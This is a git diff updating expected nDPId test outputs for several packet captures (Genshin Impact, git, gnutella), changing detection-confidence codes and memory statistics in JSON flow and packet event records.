+00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":46,"source":"genshin-impact.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1617969465739,"flow_last_seen":1617969467485,"flow_idle_time":200000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":608,"flow_tot_l4_payload_len":1990,"flow_avg_l4_payload_len":132,"midstream":0,"thread_ts_msec":1618759618761,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"47.254.169.109","src_port":59145,"dst_port":22102,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"GenshinImpact","breed":"Fun","category":"Game"}} 00561{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":46,"source":"genshin-impact.pcap","alias":"nDPId-test","packets-captured":46,"packets-processed":45,"total-skipped-flows":0,"total-l4-payload-len":8942,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":3,"total-detection-updates":0,"total-updates":0,"current-active-flows":1,"total-active-flows":3,"total-idle-flows":2,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":22,"global_ts_msec":1650541441246} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":46,"source":"genshin-impact.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1650541441246,"flow_last_seen":1650541441246,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1650541441246,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"49.51.190.178","src_port":39822,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":46,"source":"genshin-impact.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1650541441246,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1650541441246,"pkt":"eJS0JASgYDjgxTWgCABFAAA8hmVAAD8GAmXAqAJkMTO+spuOAFDYKxQrAAAAAKAC\/\/\/VsQAAAgQFtAQCCAoNnimHAAAAAAEDAwk="} 00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":47,"source":"genshin-impact.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1650541441413,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1650541441413,"pkt":"YDjgxTWgeJS0JASgCABFAAA0AABAAC4GmdIxM76ywKgCZABQm44lLXPY2CsULIAScUgpvgAAAgQFhgEBBAIBAwMC"} 00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":48,"source":"genshin-impact.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1650541441416,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1650541441416,"pkt":"eJS0JASgYDjgxTWgCABFAAAohmZAAD8GAnjAqAJkMTO+spuOAFDYKxQsJS1z2VAQAKza+QAA"} -00644{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":49,"source":"genshin-impact.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1650541441246,"flow_last_seen":1650541441416,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":42,"flow_tot_l4_payload_len":42,"flow_avg_l4_payload_len":10,"midstream":0,"thread_ts_msec":1650541441416,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"49.51.190.178","src_port":39822,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"GenshinImpact","breed":"Fun","category":"Game"}} -00822{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":61,"source":"genshin-impact.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1618759616491,"flow_last_seen":1618759618761,"flow_idle_time":200000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":606,"flow_tot_l4_payload_len":2645,"flow_avg_l4_payload_len":176,"midstream":0,"thread_ts_msec":1650541441932,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"8.209.69.191","src_port":52575,"dst_port":22101,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"GenshinImpact","breed":"Fun","category":"Game"}} +00644{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":49,"source":"genshin-impact.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1650541441246,"flow_last_seen":1650541441416,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":42,"flow_tot_l4_payload_len":42,"flow_avg_l4_payload_len":10,"midstream":0,"thread_ts_msec":1650541441416,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"49.51.190.178","src_port":39822,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"GenshinImpact","breed":"Fun","category":"Game"}} +00822{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":61,"source":"genshin-impact.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1618759616491,"flow_last_seen":1618759618761,"flow_idle_time":200000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":606,"flow_tot_l4_payload_len":2645,"flow_avg_l4_payload_len":176,"midstream":0,"thread_ts_msec":1650541441932,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"8.209.69.191","src_port":52575,"dst_port":22101,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"GenshinImpact","breed":"Fun","category":"Game"}} 00562{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":61,"source":"genshin-impact.pcap","alias":"nDPId-test","packets-captured":61,"packets-processed":60,"total-skipped-flows":0,"total-l4-payload-len":10917,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":4,"total-detection-updates":0,"total-updates":0,"current-active-flows":1,"total-active-flows":4,"total-idle-flows":3,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":29,"global_ts_msec":1650813582412} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":61,"source":"genshin-impact.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1650813582412,"flow_last_seen":1650813582412,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1650813582412,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"49.51.181.168","src_port":39686,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":61,"source":"genshin-impact.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1650813582412,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1650813582412,"pkt":"eJS0JASgYDjgxTWgCABFAAA8XGBAAD8GNXTAqAJkMTO1qJsGAFBg5zJJAAAAAKAC\/\/\/zjAAAAgQFtAQCCAo+Nj3MAAAAAAEDAwk="} 00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":62,"source":"genshin-impact.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1650813582583,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1650813582583,"pkt":"YDjgxTWgeJS0JASgCABFAAA0AABAAC4GotwxM7WowKgCZABQmwaucKQhYOcySoAScUjS6QAAAgQFhgEBBAIBAwMC"} 00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":63,"source":"genshin-impact.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1650813582587,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1650813582587,"pkt":"eJS0JASgYDjgxTWgCABFAAAoXGFAAD8GNYfAqAJkMTO1qJsGAFBg5zJKrnCkIlAQAKyEJQAA"} -00644{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":64,"source":"genshin-impact.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1650813582412,"flow_last_seen":1650813582588,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":42,"flow_tot_l4_payload_len":42,"flow_avg_l4_payload_len":10,"midstream":0,"thread_ts_msec":1650813582588,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"49.51.181.168","src_port":39686,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"GenshinImpact","breed":"Fun","category":"Game"}} -00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":76,"source":"genshin-impact.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1650541441246,"flow_last_seen":1650541441932,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1414,"flow_tot_l4_payload_len":1975,"flow_avg_l4_payload_len":131,"midstream":0,"thread_ts_msec":1650813583121,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"49.51.190.178","src_port":39822,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"GenshinImpact","breed":"Fun","category":"Game"}} +00644{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":64,"source":"genshin-impact.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1650813582412,"flow_last_seen":1650813582588,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":42,"flow_tot_l4_payload_len":42,"flow_avg_l4_payload_len":10,"midstream":0,"thread_ts_msec":1650813582588,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"49.51.181.168","src_port":39686,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"GenshinImpact","breed":"Fun","category":"Game"}} +00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":76,"source":"genshin-impact.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1650541441246,"flow_last_seen":1650541441932,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1414,"flow_tot_l4_payload_len":1975,"flow_avg_l4_payload_len":131,"midstream":0,"thread_ts_msec":1650813583121,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"49.51.190.178","src_port":39822,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"GenshinImpact","breed":"Fun","category":"Game"}} 00562{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":76,"source":"genshin-impact.pcap","alias":"nDPId-test","packets-captured":76,"packets-processed":75,"total-skipped-flows":0,"total-l4-payload-len":12925,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":5,"total-detection-updates":0,"total-updates":0,"current-active-flows":1,"total-active-flows":5,"total-idle-flows":4,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":36,"global_ts_msec":1655043605088} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":76,"source":"genshin-impact.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1655043605088,"flow_last_seen":1655043605088,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1655043605088,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"49.51.181.168","src_port":45246,"dst_port":10012,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":76,"source":"genshin-impact.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1655043605088,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1655043605088,"pkt":"eJS0JASgYDjgxTWgCABFAAA8y9BAAD8GxgPAqAJkMTO1qLC+Jxyp+mQnAAAAAKAC\/\/\/OLAAAAgQFtAQCCArRkRhbAAAAAAEDAwk="} 00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":77,"source":"genshin-impact.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1655043605260,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1655043605260,"pkt":"YDjgxTWgeJS0JASgCABFAAA0AABAAC4GotwxM7WowKgCZCccsL7ZMHkgqfpkKIAScUgbtQAAAgQFhgEBBAIBAwMC"} 00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":78,"source":"genshin-impact.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":3,"flow_last_seen":1655043605263,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1655043605263,"pkt":"eJS0JASgYDjgxTWgCABFAAAoy9FAAD8GxhbAqAJkMTO1qLC+Jxyp+mQo2TB5IVAQAKzM8AAA"} -00647{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":79,"source":"genshin-impact.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655043605088,"flow_last_seen":1655043605265,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":42,"flow_tot_l4_payload_len":42,"flow_avg_l4_payload_len":10,"midstream":0,"thread_ts_msec":1655043605265,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"49.51.181.168","src_port":45246,"dst_port":10012,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"GenshinImpact","breed":"Fun","category":"Game"}} -00690{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":90,"source":"genshin-impact.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1655043605088,"flow_last_seen":1655043606011,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":492,"flow_tot_l4_payload_len":1022,"flow_avg_l4_payload_len":68,"midstream":0,"thread_ts_msec":1655043606011,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"49.51.181.168","src_port":45246,"dst_port":10012,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"GenshinImpact","breed":"Fun","category":"Game"}} -00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":90,"source":"genshin-impact.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1650813582412,"flow_last_seen":1650813583121,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1414,"flow_tot_l4_payload_len":2008,"flow_avg_l4_payload_len":133,"midstream":0,"thread_ts_msec":1655043606011,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"49.51.181.168","src_port":39686,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"GenshinImpact","breed":"Fun","category":"Game"}} +00647{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":79,"source":"genshin-impact.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655043605088,"flow_last_seen":1655043605265,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":42,"flow_tot_l4_payload_len":42,"flow_avg_l4_payload_len":10,"midstream":0,"thread_ts_msec":1655043605265,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"49.51.181.168","src_port":45246,"dst_port":10012,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"GenshinImpact","breed":"Fun","category":"Game"}} +00690{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":90,"source":"genshin-impact.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1655043605088,"flow_last_seen":1655043606011,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":492,"flow_tot_l4_payload_len":1022,"flow_avg_l4_payload_len":68,"midstream":0,"thread_ts_msec":1655043606011,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"49.51.181.168","src_port":45246,"dst_port":10012,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"GenshinImpact","breed":"Fun","category":"Game"}} +00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":90,"source":"genshin-impact.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1650813582412,"flow_last_seen":1650813583121,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1414,"flow_tot_l4_payload_len":2008,"flow_avg_l4_payload_len":133,"midstream":0,"thread_ts_msec":1655043606011,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"49.51.181.168","src_port":39686,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"GenshinImpact","breed":"Fun","category":"Game"}} 00564{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":90,"source":"genshin-impact.pcap","alias":"nDPId-test","packets-captured":90,"packets-processed":90,"total-skipped-flows":0,"total-l4-payload-len":13947,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":6,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":6,"total-idle-flows":6,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":44,"global_ts_msec":1655043606011} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 90/90 @@ -50,9 +50,9 @@ ~~ total active/idle flows...: 6/6 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5883497 bytes -~~ total memory freed........: 5883497 bytes -~~ total allocations/frees...: 118227/118227 +~~ total memory allocated....: 6017131 bytes +~~ total memory freed........: 6017131 bytes +~~ total allocations/frees...: 120989/120989 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 461 chars ~~ json string max len.......: 829 chars diff --git a/test/results/git.pcap.out b/test/results/git.pcap.out index 93ccc1e7b..c78d1307c 100644 --- a/test/results/git.pcap.out +++ b/test/results/git.pcap.out @@ -4,8 +4,8 @@ 00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"git.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1460821630164,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1460821630164,"pkt":"nJcm0ghCPJcOZtCOCABFAAA8Q1ZAAEAGScLAqABNBZnnFbt3JMp+hgtEAAAAAKACchB0gwAAAgQFtAQCCAoBp0gSAAAAAAEDAwo="} 00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"git.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1460821630221,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1460821630221,"pkt":"PJcOZtCOnJcm0ghCCABFCAA8AABAAC8GnhAFmecVwKgATSTKu3dqwE5VfoYLRaASOJBfrwAAAgQFrAQCCAorjWmrAadIEgEDAwc="} 00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"git.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1460821630222,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1460821630222,"pkt":"nJcm0ghCPJcOZtCOCABFAAA0Q1dAAEAGScnAqABNBZnnFbt3JMp+hgtFasBOVoAQAB3G2AAAAQEICgGnSCArjWmr"} -00632{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"git.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1460821630164,"flow_last_seen":1460821630222,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":69,"flow_tot_l4_payload_len":69,"flow_avg_l4_payload_len":17,"midstream":0,"thread_ts_msec":1460821630222,"l3_proto":"ip4","src_ip":"192.168.0.77","dst_ip":"5.153.231.21","src_port":47991,"dst_port":9418,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"Git","breed":"Safe","category":"Collaborative"}} -00678{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":90,"source":"git.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":90,"flow_first_seen":1460821630164,"flow_last_seen":1460821631269,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2880,"flow_tot_l4_payload_len":68049,"flow_avg_l4_payload_len":756,"midstream":0,"thread_ts_msec":1460821631269,"l3_proto":"ip4","src_ip":"192.168.0.77","dst_ip":"5.153.231.21","src_port":47991,"dst_port":9418,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Git","breed":"Safe","category":"Collaborative"}} +00632{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"git.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1460821630164,"flow_last_seen":1460821630222,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":69,"flow_tot_l4_payload_len":69,"flow_avg_l4_payload_len":17,"midstream":0,"thread_ts_msec":1460821630222,"l3_proto":"ip4","src_ip":"192.168.0.77","dst_ip":"5.153.231.21","src_port":47991,"dst_port":9418,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"Git","breed":"Safe","category":"Collaborative"}} +00678{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":90,"source":"git.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":90,"flow_first_seen":1460821630164,"flow_last_seen":1460821631269,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2880,"flow_tot_l4_payload_len":68049,"flow_avg_l4_payload_len":756,"midstream":0,"thread_ts_msec":1460821631269,"l3_proto":"ip4","src_ip":"192.168.0.77","dst_ip":"5.153.231.21","src_port":47991,"dst_port":9418,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Git","breed":"Safe","category":"Collaborative"}} 00552{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":90,"source":"git.pcap","alias":"nDPId-test","packets-captured":90,"packets-processed":90,"total-skipped-flows":0,"total-l4-payload-len":68049,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":9,"global_ts_msec":1460821631269} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 90/90 @@ -15,9 +15,9 @@ ~~ total active/idle flows...: 1/1 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5872053 bytes -~~ total memory freed........: 5872053 bytes -~~ total allocations/frees...: 118204/118204 +~~ total memory allocated....: 6005687 bytes +~~ total memory freed........: 6005687 bytes +~~ total allocations/frees...: 120966/120966 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 459 chars ~~ json string max len.......: 683 chars diff --git a/test/results/gnutella.pcap.out b/test/results/gnutella.pcap.out index a3324eb5f..f1991cc43 100644 --- a/test/results/gnutella.pcap.out +++ b/test/results/gnutella.pcap.out @@ -3,58 +3,58 @@ 00259{"packet_event_id":1,"packet_event_name":"packet","packet_id":1,"source":"gnutella.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":4,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":4,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"AAAAAA=="} 00516{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":9752,"flow_last_seen":9752,"flow_idle_time":140000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":9752,"l3_proto":"ip6","src_ip":"::","dst_ip":"ff02::1:ffa4:e108","l4_proto":"icmp6","flow_datalink":1,"flow_max_packets":3} 00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":9752,"flow_idle_time":140000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":78,"pkt_l4_len":24,"thread_ts_msec":9752,"pkt":"MzP\/pOEICAAn5uVZht1gAAAAABg6\/wAAAAAAAAAAAAAAAAAAAAD\/AgAAAAAAAAAAAAH\/pOEIhwAMIAAAAAD+gAAAAAAAAMUNUZ+WpOEI"} -00577{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":9752,"flow_last_seen":9752,"flow_idle_time":140000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":9752,"l3_proto":"ip6","src_ip":"::","dst_ip":"ff02::1:ffa4:e108","l4_proto":"icmp6","ndpi": {"confidence": {"4":"DPI"},"proto":"ICMPV6","breed":"Acceptable","category":"Network"}} 